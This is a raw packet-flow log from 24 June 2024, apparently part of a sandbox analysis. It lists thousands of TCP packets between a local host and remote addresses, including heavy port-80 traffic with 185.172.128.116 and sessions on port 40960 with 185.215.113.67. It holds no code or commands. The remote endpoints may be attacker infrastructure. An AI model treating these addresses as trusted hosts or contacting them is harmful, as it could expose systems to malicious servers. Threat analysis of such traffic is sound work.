Jun 24, 2024 00:10:13.010802031 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010813951 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010818005 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010833979 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010849953 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010850906 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010867119 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010881901 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010890961 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010900974 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.010911942 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.010941982 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.011198997 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011214018 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011229038 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011244059 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011260033 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011272907 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.011276960 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011292934 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011293888 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.011308908 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011317015 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.011326075 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011341095 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011341095 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.011358023 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011373043 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011379957 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.011389971 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011405945 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011420965 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.011420965 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011446953 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.011471987 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.011697054 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011712074 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011727095 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011742115 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011760950 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.011780024 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.011812925 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.011864901 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011881113 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.011924982 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.012046099 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.012103081 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.012123108 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.012185097 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.012304068 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.012356043 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.012527943 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.012545109 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.012559891 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.012584925 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.012605906 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.012689114 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.012744904 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.012887955 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.012903929 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.012916088 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.012934923 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.012955904 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.012990952 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.098108053 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098275900 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.098297119 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098313093 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098329067 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098366022 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.098406076 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.098500967 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098525047 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098539114 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098578930 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.098625898 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.098645926 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098659992 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098675013 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098711014 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.098758936 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.098824978 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098839998 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098855972 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098869085 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098884106 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.098886013 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098901033 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098917007 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098929882 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098934889 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.098954916 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098969936 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098972082 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.098985910 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.098990917 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.099000931 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.099015951 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.099030018 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.099036932 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.099045992 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.099061966 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.099076033 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.099076986 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.099083900 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.099093914 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.099138021 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.101691961 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.101758003 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.101773024 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.101797104 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.101819992 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.101835966 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.101843119 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.101865053 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.101877928 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.101900101 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.101900101 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.101943970 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.101964951 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.101965904 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.101982117 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.101996899 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102011919 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102021933 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102040052 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102086067 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102114916 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102130890 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102170944 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102201939 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102222919 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102237940 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102252960 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102274895 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102312088 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102312088 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102365971 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102380991 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102394104 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102407932 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102421999 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102436066 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102437019 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102461100 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102474928 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102484941 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102500916 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102515936 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102520943 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102520943 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102547884 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102564096 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102576971 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102581978 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102627993 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102659941 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102674007 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102688074 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102701902 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102714062 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102716923 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102735996 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102745056 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102776051 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102809906 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102826118 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102839947 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102854967 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102869034 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102880001 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102899075 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102935076 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.102969885 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.102993011 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103008032 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103022099 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103035927 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103035927 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103053093 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103058100 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103112936 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103112936 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103133917 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103149891 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103171110 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103185892 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103187084 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103200912 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103209019 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103224039 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103234053 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103279114 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103323936 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103339911 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103353024 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103368044 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103384972 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103416920 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103446007 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103461027 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103475094 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103488922 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103502035 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103503942 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103543043 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103553057 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103576899 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103579044 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103607893 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103641033 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103739023 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103754044 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103768110 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103795052 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103821039 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103827953 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103842974 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.103873014 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103888988 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.103986025 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104012966 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104032040 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104038954 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.104046106 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104059935 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.104062080 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104079008 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104082108 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.104104996 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.104110956 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104125977 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104126930 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.104140043 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104155064 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104155064 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.104162931 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104176044 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.104187012 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104198933 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.104202986 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104217052 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104229927 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104235888 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.104244947 CEST	80	49711	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:13.104258060 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.104295015 CEST	49711	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:13.187638998 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:13.192473888 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:13.480564117 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:13.480585098 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:13.480597019 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:13.480608940 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:13.480679989 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:13.480792999 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:13.567897081 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:13.568147898 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:13.568217039 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:13.676964998 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:13.730905056 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:13.786041975 CEST	49710	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:13.786705971 CEST	49712	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:13.793137074 CEST	80	49710	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:13.793219090 CEST	49710	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:13.793345928 CEST	80	49712	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:13.793416023 CEST	49712	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:13.805957079 CEST	49712	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:13.812433004 CEST	80	49712	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:14.155472040 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:14.161767006 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:14.401133060 CEST	49713	443	192.168.2.5	40.127.169.103
Jun 24, 2024 00:10:14.401235104 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:14.401335955 CEST	49713	443	192.168.2.5	40.127.169.103
Jun 24, 2024 00:10:14.410886049 CEST	49713	443	192.168.2.5	40.127.169.103
Jun 24, 2024 00:10:14.410916090 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:14.449178934 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:14.469029903 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:14.476314068 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:14.501410961 CEST	80	49712	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:14.506185055 CEST	49712	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:14.588601112 CEST	49714	443	192.168.2.5	140.82.121.3
Jun 24, 2024 00:10:14.588700056 CEST	443	49714	140.82.121.3	192.168.2.5
Jun 24, 2024 00:10:14.588784933 CEST	49714	443	192.168.2.5	140.82.121.3
Jun 24, 2024 00:10:14.699166059 CEST	49714	443	192.168.2.5	140.82.121.3
Jun 24, 2024 00:10:14.699235916 CEST	443	49714	140.82.121.3	192.168.2.5
Jun 24, 2024 00:10:14.761356115 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:14.804873943 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:15.198034048 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:15.198123932 CEST	49713	443	192.168.2.5	40.127.169.103
Jun 24, 2024 00:10:15.200896025 CEST	49713	443	192.168.2.5	40.127.169.103
Jun 24, 2024 00:10:15.200907946 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:15.201232910 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:15.246530056 CEST	49713	443	192.168.2.5	40.127.169.103
Jun 24, 2024 00:10:15.360038996 CEST	443	49714	140.82.121.3	192.168.2.5
Jun 24, 2024 00:10:15.360157013 CEST	49714	443	192.168.2.5	140.82.121.3
Jun 24, 2024 00:10:15.446748972 CEST	49714	443	192.168.2.5	140.82.121.3
Jun 24, 2024 00:10:15.446810007 CEST	443	49714	140.82.121.3	192.168.2.5
Jun 24, 2024 00:10:15.447303057 CEST	443	49714	140.82.121.3	192.168.2.5
Jun 24, 2024 00:10:15.447379112 CEST	49714	443	192.168.2.5	140.82.121.3
Jun 24, 2024 00:10:15.454869032 CEST	49714	443	192.168.2.5	140.82.121.3
Jun 24, 2024 00:10:15.500514030 CEST	443	49714	140.82.121.3	192.168.2.5
Jun 24, 2024 00:10:15.791028023 CEST	443	49714	140.82.121.3	192.168.2.5
Jun 24, 2024 00:10:15.791155100 CEST	443	49714	140.82.121.3	192.168.2.5
Jun 24, 2024 00:10:15.791227102 CEST	443	49714	140.82.121.3	192.168.2.5
Jun 24, 2024 00:10:15.791265011 CEST	49714	443	192.168.2.5	140.82.121.3
Jun 24, 2024 00:10:15.791361094 CEST	49714	443	192.168.2.5	140.82.121.3
Jun 24, 2024 00:10:15.802941084 CEST	49714	443	192.168.2.5	140.82.121.3
Jun 24, 2024 00:10:15.802963972 CEST	443	49714	140.82.121.3	192.168.2.5
Jun 24, 2024 00:10:15.816740036 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:15.816816092 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:15.816910028 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:15.817176104 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:15.817212105 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:15.880537033 CEST	49718	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:15.885509014 CEST	80	49718	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:15.885759115 CEST	49718	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:15.885759115 CEST	49718	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:15.890557051 CEST	80	49718	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:16.104540110 CEST	49713	443	192.168.2.5	40.127.169.103
Jun 24, 2024 00:10:16.148524046 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:16.294363976 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.294550896 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.306495905 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.306545973 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.306984901 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.307096004 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.307725906 CEST	49717	443	192.168.2.5	185.199.111.133
Jun 24, 2024 00:10:16.352503061 CEST	443	49717	185.199.111.133	192.168.2.5
Jun 24, 2024 00:10:16.357270002 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:16.357331038 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:16.357367039 CEST	443	49713	40.127.169.103	192.168.2.5
Jun 24, 2024 00:10:16.357413054 CEST	49713	443	192.168.2.5	40.127.169.103
